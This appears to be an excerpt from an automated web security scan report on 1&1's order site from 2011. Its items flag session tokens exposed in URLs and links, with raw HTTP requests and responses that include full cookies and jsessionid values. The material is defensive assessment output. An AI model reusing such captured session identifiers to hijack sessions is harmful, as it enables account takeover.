Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=FeatureWebspaceExplorer&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=FeatureWebspaceExplorer&amp;page=switch&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=FeatureWebspaceExplorer&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=FeatureWebspaceExplorer&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureWebspaceExplorer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:01:11 GMT; Path=/
ETag: 1bb8645f85cd004134e2d01fcda6ff8b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17511


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.68. http://order.1and1.com/xml/order/FirstWebsite  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FirstWebsite

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/FirstWebsite;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:37:35 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FirstWebsite?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.69. http://order.1and1.com/xml/order/Gtc  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Gtc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tandc HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Gtc?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.tandc
Content-Length: 0
Connection: close
Content-Type: text/plain


3.70. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.71. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li class="tabs-home"><a style="background:none;" class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.customerlogin&amp;site=CC.WH.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=hd.nav.customerlogin" rel="redirectlink-hd-nav-customerlogin">
Customer Login
</a>
...[SNIP]...
<li class="tabs-home"><a class="core_button_normal" href="/xml/order/Contact;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.support" rel="button-hd-nav-support">Support</a>
...[SNIP]...
</table><a class="teaserlink" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/free_6mounths.png" alt="Web Hosting" class="alphapng hostingbox price-stopper-countdown" width="193" height="121"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=weiter" rel="button-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<img src="/oneandone_en_common/img/pages/Home/pr_9_99_diy_free_trial.png" alt="FREE TRIAL then starting at $ 9.99/month" class="alphapng pos-price-doityourself price-stopper" width="89" height="95"><a class="btn btn-yellow-medium btn-pos-home-top" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"><span>More</span></a><a class="teaserlink" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=weiter&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=weiter" rel="redirectlink-weiter"></a>
...[SNIP]...
<div id="navigation" class="homepos"><a class="core_button_normal" href="/xml/order/sitedesign;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><img src="/oneandone_en_common/img/pages/Home/teaser_sitedesign.png" alt="" class="alphapng teaser-sitedesign" width="186" height="191">
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=hd.nav.mybusinesssite&amp;site=PU.NGH.US&amp;origin.page=Home&amp;page=switch&amp;linkOrigin=Home&amp;linkId=hd.nav.mybusinesssite" rel="redirectlink-hd-nav-mybusinesssite">MyBusiness Site</a>
...[SNIP]...
